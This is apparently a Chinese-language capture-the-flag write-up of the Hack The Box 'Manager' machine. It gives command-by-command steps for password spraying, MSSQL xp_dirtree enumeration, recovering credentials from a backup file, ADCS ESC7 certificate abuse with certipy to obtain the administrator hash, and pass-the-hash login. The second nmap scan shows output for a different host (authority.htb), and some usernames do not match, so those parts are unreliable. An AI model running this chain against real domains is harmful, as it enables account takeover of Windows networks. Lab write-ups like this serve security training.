Manager

Administrator

2023-10-27

HTB Windows

Machine：Windows

Level：Medium

Nmap

└─# nmap -p- 10.10.11.236
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49687/tcp open  unknown
49688/tcp open  unknown
49689/tcp open  unknown
49726/tcp open  unknown
54243/tcp open  unknown
54436/tcp open  unknown

└─# nmap -p 45,53,80,88,135,139,389,464,593,636,1433,3268,3269,5985,9389 -sC -sV 10.10.11.222
PORT     STATE  SERVICE      VERSION
45/tcp   closed mpm
53/tcp   open   domain       Simple DNS Plus
80/tcp   open   http     Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open   kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-25 18:16:34Z)
135/tcp  open   msrpc        Microsoft Windows RPC
139/tcp  open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open   ldap     Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:33+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open   ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:34+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
1433/tcp closed ms-sql-s
3268/tcp open   ldap     Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-25T18:17:33+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3269/tcp open   ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-10-25T18:17:34+00:00; +3h59m59s from scanner time.
5985/tcp open   http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open   mc-nmf       .NET Message Framing
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-10-25T18:17:24
|_  start_date: N/A
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s

User Access

Password Spraying → MSSQL

网站上并没有什么有意思的地方尝试用空密码枚举出一些用户。

└─# crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
SMB     manager.htb     445    DC01    [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB     manager.htb     445    DC01    [+] manager.htb\anonymous: 
SMB     manager.htb     445    DC01    [+] Brute forcing RIDs
SMB     manager.htb     445    DC01    498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB     manager.htb     445    DC01    500: MANAGER\Administrator (SidTypeUser)
SMB     manager.htb     445    DC01    501: MANAGER\Guest (SidTypeUser)
SMB     manager.htb     445    DC01    502: MANAGER\krbtgt (SidTypeUser)
SMB     manager.htb     445    DC01    512: MANAGER\Domain Admins (SidTypeGroup)
SMB     manager.htb     445    DC01    513: MANAGER\Domain Users (SidTypeGroup)
SMB     manager.htb     445    DC01    514: MANAGER\Domain Guests (SidTypeGroup)
SMB     manager.htb     445    DC01    515: MANAGER\Domain Computers (SidTypeGroup)
SMB     manager.htb     445    DC01    516: MANAGER\Domain Controllers (SidTypeGroup)
SMB     manager.htb     445    DC01    517: MANAGER\Cert Publishers (SidTypeAlias)
SMB     manager.htb     445    DC01    518: MANAGER\Schema Admins (SidTypeGroup)
SMB     manager.htb     445    DC01    519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB     manager.htb     445    DC01    520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB     manager.htb     445    DC01    521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB     manager.htb     445    DC01    522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB     manager.htb     445    DC01    525: MANAGER\Protected Users (SidTypeGroup)
SMB     manager.htb     445    DC01    526: MANAGER\Key Admins (SidTypeGroup)
SMB     manager.htb     445    DC01    527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB     manager.htb     445    DC01    553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB     manager.htb     445    DC01    571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB     manager.htb     445    DC01    572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB     manager.htb     445    DC01    1000: MANAGER\DC01$ (SidTypeUser)
SMB     manager.htb     445    DC01    1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB     manager.htb     445    DC01    1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB     manager.htb     445    DC01    1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB     manager.htb     445    DC01    1113: MANAGER\Zhong (SidTypeUser)
SMB     manager.htb     445    DC01    1114: MANAGER\Cheng (SidTypeUser)
SMB     manager.htb     445    DC01    1115: MANAGER\Ryan (SidTypeUser)
SMB     manager.htb     445    DC01    1116: MANAGER\Raven (SidTypeUser)
SMB     manager.htb     445    DC01    1117: MANAGER\JinWoo (SidTypeUser)
SMB     manager.htb     445    DC01    1118: MANAGER\ChinHae (SidTypeUser)
SMB     manager.htb     445    DC01    1119: MANAGER\Operator (SidTypeUser)

这里发现了几个用户账户保存下来进行密码喷洒攻击，由于在前面的端口扫描中发现了smb和mssql端口开启所以在两个服务上都进行密码喷洒。

└─# crackmapexec smb 10.10.11.236 -u user.txt -p passwd.txt --no-brute 
SMB     10.10.11.236    445    DC01     [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB     10.10.11.236    445    DC01     [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE 
SMB     10.10.11.236    445    DC01     [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE 
SMB     10.10.11.236    445    DC01     [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE 
SMB     10.10.11.236    445    DC01     [-] manager.htb\JinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB     10.10.11.236    445    DC01     [+] manager.htb\ChinHaw:chinHaw 

└─# crackmapexec mssql 10.10.11.236 -u user.txt -p passwd.txt --no-brute
MSSQL       10.10.11.236    1433   DC01     [*] Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01     [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL       10.10.11.236    1433   DC01     [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL       10.10.11.236    1433   DC01     [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL       10.10.11.236    1433   DC01     [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL       10.10.11.236    1433   DC01     [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL       10.10.11.236    1433   DC01     [+] manager.htb\Operator:operator

MSQQL Injection

使用Operator:operator登录mssql服务，尝试后发现xp_cmdshell无权执行但xp_dirtree可以注入，经过翻查注意到网站目录下有个备份文件，去网站上下载。

└─# impacket-mssqlclient manager.htb/Operator:operator@10.10.11.236 -windows-auth
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   
contact.html                          1      1   
css                                   1      0   
images                                1      0   
index.html                            1      1   
js                                    1      0   
service.html                          1      1   
web.config                            1      1   
website-backup-27-07-23-old.zip       1      1

Backup → raven

文件中有一个.old-conf.xml中储存了ssh的登录信息。

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>[deleted]</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Root Access

Certipy → ESC7

利用certipy寻找有没有可以利用的ADCS证书模板

└─# certipy find -vulnerable -stdout -u raven -p '[deleted]' -dc-ip 10.10.11.236 
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

发现Raven用户存在易受攻击证书授权访问控制漏洞，跟着文章中的Attack 2便可以获得Root密码的hash。

└─# certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@10.10.11.236 -password '[deleted]' -debug
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.10.11.236
[*] User 'Raven' already has officer rights on 'manager-DC01-CA'

└─# certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@10.10.11.236 -password '[deleted]'
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

└─# certipy req -username raven@10.10.11.236 -password '[deleted]' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate

└─# certipy ca -ca 'manager-DC01-CA' -issue-request 14 -username raven@10.10.11.236 -password '[deleted]'
[*] Successfully issued certificate

└─# certipy req -username raven@10.10.11.236 -password '[deleted]' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 14
[*] Rerieving certificate with ID 14
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '14.key'
[*] Saved certificate and private key to 'administrator.pfx'

#同步服务器时间
└─# ntpdate -s 10.10.11.236
└─# certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:[deleted]

利用已知的账密登录。

└─# evil-winrm -i 10.10.11.236 -u administrator -H [deleted]
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator

相关文章链接

浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击